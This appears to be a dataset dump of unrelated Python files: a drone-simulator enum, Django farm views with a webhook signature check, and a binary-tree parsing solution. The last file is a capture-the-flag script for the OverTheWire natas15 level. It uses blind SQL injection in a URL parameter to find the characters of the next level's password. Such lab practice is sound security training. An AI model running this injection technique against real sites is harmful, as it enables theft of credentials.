    "none": ["airsim", "gazebo", "ignition", "none"],
}
class VehicleType(IntEnum):
    """Supported vehicle categories."""
    DRONE = 0
    ROVER = 1
    PLANE = 2
class SimType(IntEnum):
    """Supported simulator backends."""
    NONE = 0
    GAZEBO = 1
    AIRSIM = 2
    IGNITION = 3
class ApiType(IntEnum):
    """Vehicle control API flavours."""
    NONE = 0
    INHERENT = 1
    MAVROS = 2
class SimSource(IntEnum):
    """Source of simulation model assets."""
    DEFAULT = 0
    ROBOT = 1
    NUAV = 2
class ScenarioType(IntEnum):
    """Available scenario kinds."""
    NONE = 0
    DARKNET = auto()
| StarcoderdataPython |
4840761 | import hmac
import json
from base64 import b64encode
from hashlib import sha256
from django.conf import settings
from django.core.serializers import serialize
from django.http import Http404, HttpResponse
from django.http.response import JsonResponse
from django.shortcuts import render
from django.views.generic.base import TemplateView
from rest_framework import authentication, permissions, status
from django.contrib.gis.db.models.functions import Centroid, AsGeoJSON
from rest_framework.response import Response
from rest_framework.views import APIView
from django.views import generic
from rest_framework import viewsets
from .models import Field, Farm
from .serializers import PersonToRoleToOrgSerializer, FarmSerializer
from .utils.survey.parser import parse_survey
import requests
from django.contrib.auth.mixins import LoginRequiredMixin
from django.conf import settings
class FarmsView(LoginRequiredMixin, generic.ListView):
    """List all farms; requires an authenticated user."""
    template_name = "farms.html"
    model = Farm
class FarmDetail(LoginRequiredMixin, generic.DetailView):
    """Detail page for one farm, exposing its fields as GeoJSON."""
    template_name = "farm_detail.html"
    model = Farm

    def get_context_data(self, **kwargs):
        """Return the view context data."""
        context = super().get_context_data(**kwargs)
        # Serialize all fields belonging to this farm for the map widget.
        farm_fields = Field.objects.filter(farm=context['farm'])
        context["geojson"] = json.loads(serialize("geojson", farm_fields))
        return context
class FieldDetail(LoginRequiredMixin, generic.DetailView):
    """Detail page for one field with soil stats and geometry summary."""
    template_name = "field_detail.html"
    model = Field

    def get_context_data(self, **kwargs):
        """Return the view context data."""
        context = super().get_context_data(**kwargs)
        # GeoJSON of just this field's geometry for the map widget.
        context["geojson"] = json.loads(serialize("geojson", [context['field']]))
        # Blocking HTTP call to the external monitoring service for
        # organic-carbon-stock statistics over the field footprint.
        res = requests.post(settings.MONITORING_SVC_URL + '/soilgrids/ocs_0-30cm_mean', json=context['geojson'])
        context["stats"] = res.json()
        centroid = context['field'].geom.centroid
        context["specs"] = {
            "latitude" : centroid.y,
            "longitude" : centroid.x,
            # EPSG:3035 is metre-based; /10000 presumably converts m^2 to
            # hectares -- verify against the template's expected unit.
            "area" : round(context['field'].geom.transform('EPSG:3035', clone=True).area / 10000, 2)
        }
        return context
###########################################################################################
# API Views
###########################################################################################
class FarmsViewSet(viewsets.ModelViewSet):
    """REST CRUD endpoints for farms, ordered alphabetically by name."""
    serializer_class = FarmSerializer
    queryset = Farm.objects.all().order_by('name')
# Create your views here.
class TypeFormFarmerSurvey(APIView):
    """
    Receives a TypeForm Farmer Survey response through a webhook and parses it into FarmDB
    """
    # Webhook endpoint: Typeform cannot authenticate with DRF, so the request
    # is validated via its HMAC signature (see `valid_typeform_signature`).
    authentication_classes = []
    permission_classes = [permissions.AllowAny]

    def get(self, request, pk, format=None):
        # NOTE(review): returning None from a DRF view is not a valid HTTP
        # response -- presumably a stub; confirm whether GET should be removed
        # or return an explicit 405 instead.
        return None

    def post(self, request, format=None):
        # Only accept payloads carrying a valid Typeform HMAC signature.
        if valid_typeform_signature(request):
            parsed_data = parse_survey(request.data)
            # TODO: try/except to store request body and stacktrace to debug db table
            serializer = PersonToRoleToOrgSerializer(data=parsed_data)
            if serializer.is_valid():
                serializer.save()
                return Response(serializer.data, status=status.HTTP_201_CREATED)
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        # Bad or missing signature: reject without leaking details.
        return Response({}, status=status.HTTP_401_UNAUTHORIZED)
def valid_typeform_signature(request):
    """Return ``True`` if the request carries a valid Typeform webhook signature.

    Typeform signs the raw request body with HMAC-SHA256 using the shared
    webhook secret and sends ``sha256=<base64 digest>`` in the
    ``Typeform-Signature`` header.

    Args:
        request: Incoming HTTP request (``META`` and raw ``body`` are read).

    Returns:
        bool: Whether the header matches the locally computed signature.
    """
    api_signature = request.META.get("HTTP_TYPEFORM_SIGNATURE")
    if api_signature is None:
        # Header absent: cannot be valid (also keeps compare_digest happy).
        return False
    secret = settings.FARMDB_CORE_TYPEFORM_SECRET
    computed_sig = hmac.new(
        secret.encode("utf-8"), msg=request.body, digestmod=sha256
    ).digest()
    signature = "sha256=" + b64encode(computed_sig).decode()
    # Constant-time comparison to avoid leaking the signature via timing.
    return hmac.compare_digest(api_signature, signature)
| StarcoderdataPython |
1646994 | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
    def str2tree(self, s: str) -> TreeNode:
        """Deserialize a string like ``"1(2(4))(3)"`` into a binary tree.

        Each node is rendered as ``<int>`` optionally followed by
        ``(<left>)`` and ``(<right>)``. Returns the root node, or ``None``
        for an empty string.
        """
        def buildTree(s):
            # find the first left bracket
            ix = s.find('(')
            if ix < 0:
                # No children: the whole string is one node value.
                return TreeNode(int(s)) if s else None
            # Scan for the ')' matching the '(' at position ix.
            lcounter = 1
            rcounter = 0
            jx = ix + 1
            while jx < len(s) and lcounter >= rcounter:
                if s[jx] == '(':
                    lcounter += 1
                elif s[jx] == ')':
                    rcounter += 1
                    if rcounter == lcounter:
                        break
                jx += 1
            if s[:ix] != '':
                # BUGFIX: convert the value to int, matching the leaf case
                # above (previously internal nodes stored the raw string).
                root = TreeNode(int(s[:ix]))
                root.left = buildTree(s[ix+1:jx])
                root.right = buildTree(s[jx+1:-1])
            else:
                # String starts with '(' (stripped-paren recursion case):
                # the parenthesized substring itself is the node.
                root = buildTree(s[ix+1:jx])
            return root
        return buildTree(s)
# class Solution:
# '''
# Modified version
# '''
# def str2tree(self, s: str) -> TreeNode:
# def buildTree(s):
# # find the first left bracket
# ix = s.find('(')
# if ix < 0:
# return TreeNode(int(s)) if s else None
# unmatched = 1
# jx = ix + 1
# while jx < len(s):
# if s[jx] == '(':
# unmatched += 1
# elif s[jx] == ')':
# unmatched -= 1
# if unmatched == 0:
# break
# jx += 1
# root = TreeNode(s[:ix])
# root.left = buildTree(s[ix+1:jx])
# root.right = buildTree(s[jx+2:-1])
# return root
# node = buildTree(s)
# return node
# class Solution:
# '''
# solution from others
# '''
# def str2tree(self, S):
# ix = S.find('(')
# if ix < 0:
# return TreeNode(int(S)) if S else None
# bal = 0
# for jx, u in enumerate(S):
# if u == '(': bal += 1
# if u == ')': bal -= 1
# if jx > ix and bal == 0:
# break
# root = TreeNode(int(S[:ix]))
# root.left = self.str2tree(S[ix+1:jx])
# root.right = self.str2tree(S[jx+2:-1])
# return root
| StarcoderdataPython |
164485 | <filename>Python/natas15-chars.py
# brute forcing password of natas 15
import requests

# Candidate alphabet for the next level's password (alphanumeric only).
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

# HTTP basic-auth credentials for the natas15 challenge page.
username = "natas15"
password = "<PASSWORD>"

# Marker the page prints when the injected query matched a row.
user_exists = "This user exists."
char_exists = ""

for char in characters:
    # Blind SQL injection: `like binary '%<char>%'` makes the page report
    # "user exists" only if <char> occurs (case-sensitively) in natas16's
    # password; this discovers the password's character set, not its order.
    url = 'http://natas15.natas.labs.overthewire.org/index.php?username=natas16" and password like binary' + "'%" + char + "%'" + '"'
    response = requests.get(url, auth= (username, password) )
    print("checked: ", char)
    if user_exists in response.text:
        # Accumulate every character known to appear in the password.
        char_exists += char
        print("character exists ", char_exists)
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.